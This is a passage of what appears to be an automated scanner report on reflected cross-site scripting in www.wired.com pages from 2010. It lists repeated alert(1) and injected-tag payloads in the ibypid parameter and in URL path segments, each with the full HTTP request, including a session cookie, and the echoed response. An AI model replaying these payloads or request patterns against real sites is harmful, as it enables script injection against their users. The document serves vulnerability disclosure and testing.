<head p ...[SNIP]... <script>var currentNavFrame = 9f56c8;alert(1)//bb7f19b9979;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c43e3%3balert(1)//d95607fec28 was submitted in the ibypid parameter. This input was echoed as c43e3;alert(1)//d95607fec28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/09/bittorrent-or-box-office/?ibypid=11c43e3%3balert(1)//d95607fec28 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:35 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=449
Expires: Sun, 21 Nov 2010 23:22:04 GMT
Date: Sun, 21 Nov 2010 23:14:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107877
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 11c43e3;alert(1)//d95607fec28;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1b488%3balert(1)//92eb5cb2444 was submitted in the ibypid parameter. This input was echoed as 1b488;alert(1)//92eb5cb2444 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/09/re-animators/?ibypid=101b488%3balert(1)//92eb5cb2444 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:39 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=467
Expires: Sun, 21 Nov 2010 23:22:26 GMT
Date: Sun, 21 Nov 2010 23:14:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 101b488;alert(1)//92eb5cb2444;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8030b%3balert(1)//54f8fbfd62 was submitted in the ibypid parameter. This input was echoed as 8030b;alert(1)//54f8fbfd62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/09/the-molecular-pantry/?ibypid=88030b%3balert(1)//54f8fbfd62 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:35 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:35 GMT
Date: Sun, 21 Nov 2010 23:14:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104883
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 88030b;alert(1)//54f8fbfd62;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dc247%3balert(1)//401a89ca126 was submitted in the ibypid parameter. This input was echoed as dc247;alert(1)//401a89ca126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/10/buy-it-or-burn-it?ibypid=12dc247%3balert(1)//401a89ca126 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:13:45 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=438
Expires: Sun, 21 Nov 2010 23:21:03 GMT
Date: Sun, 21 Nov 2010 23:13:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 12dc247;alert(1)//401a89ca126;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 99586%3balert(1)//29128e720c6 was submitted in the ibypid parameter. This input was echoed as 99586;alert(1)//29128e720c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/10/peak-everything?ibypid=1399586%3balert(1)//29128e720c6 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:02 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:02 GMT
Date: Sun, 21 Nov 2010 23:14:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 1399586;alert(1)//29128e720c6;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c5cb%3balert(1)//5e37e52b0bb was submitted in the ibypid parameter. This input was echoed as 8c5cb;alert(1)//5e37e52b0bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/10/turkeys-and-triumphs?ibypid=148c5cb%3balert(1)//5e37e52b0bb HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:13:43 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:21:43 GMT
Date: Sun, 21 Nov 2010 23:13:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107511
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 148c5cb;alert(1)//5e37e52b0bb;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bc9b9%3balert(1)//3b7177fe795 was submitted in the ibypid parameter. This input was echoed as bc9b9;alert(1)//3b7177fe795 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/11/avoiding-bad-holiday-albums?ibypid=15bc9b9%3balert(1)//3b7177fe795 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:13:40 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:21:40 GMT
Date: Sun, 21 Nov 2010 23:13:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106915
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 15bc9b9;alert(1)//3b7177fe795;</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e89c"><a>d3ad9ae676c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech8e89c"><a>d3ad9ae676c HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29378
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:03 GMT
Date: Mon, 22 Nov 2010 01:11:03 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech8e89c"><a>d3ad9ae676c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41041"><a>c86672fee37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech41041"><a>c86672fee37/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29379
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Sun, 21 Nov 2010 20:19:52 GMT
Date: Sun, 21 Nov 2010 20:16:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech41041"><a>c86672fee37"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6c78"><a>e49d3eb099e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtechc6c78"><a>e49d3eb099e/drugs HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:38 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtechc6c78"><a>e49d3eb099e ss_drugs"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65f1"><a>11d5934ee8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech/drugsc65f1"><a>11d5934ee8b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:08 GMT
Date: Sun, 21 Nov 2010 23:09:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech ss_drugsc65f1"><a>11d5934ee8b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6e54"><a>33024249170 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtecha6e54"><a>33024249170/genetics HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29399
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:38 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtecha6e54"><a>33024249170 ss_genetics"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b5c"><a>80a5cb3973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech/genetics56b5c"><a>80a5cb3973b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29399
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:15 GMT
Date: Sun, 21 Nov 2010 23:09:15 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech ss_genetics56b5c"><a>80a5cb3973b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0876"><a>211d7d736ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medteche0876"><a>211d7d736ef/health HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29395
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:41 GMT
Date: Sun, 21 Nov 2010 23:08:41 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medteche0876"><a>211d7d736ef ss_health"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9f9"><a>5052cbc9d21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech/healthed9f9"><a>5052cbc9d21 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29395
Vary: Accept-Encoding
Cache-Control: max-age=549
Expires: Sun, 21 Nov 2010 23:18:22 GMT
Date: Sun, 21 Nov 2010 23:09:13 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech ss_healthed9f9"><a>5052cbc9d21"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d1ff"><a>67b5e859397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech7d1ff"><a>67b5e859397/stemcells HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:48 GMT
Date: Sun, 21 Nov 2010 23:08:48 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech7d1ff"><a>67b5e859397 ss_stemcells"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e76"><a>2f9c85fc36d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech/stemcells32e76"><a>2f9c85fc36d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
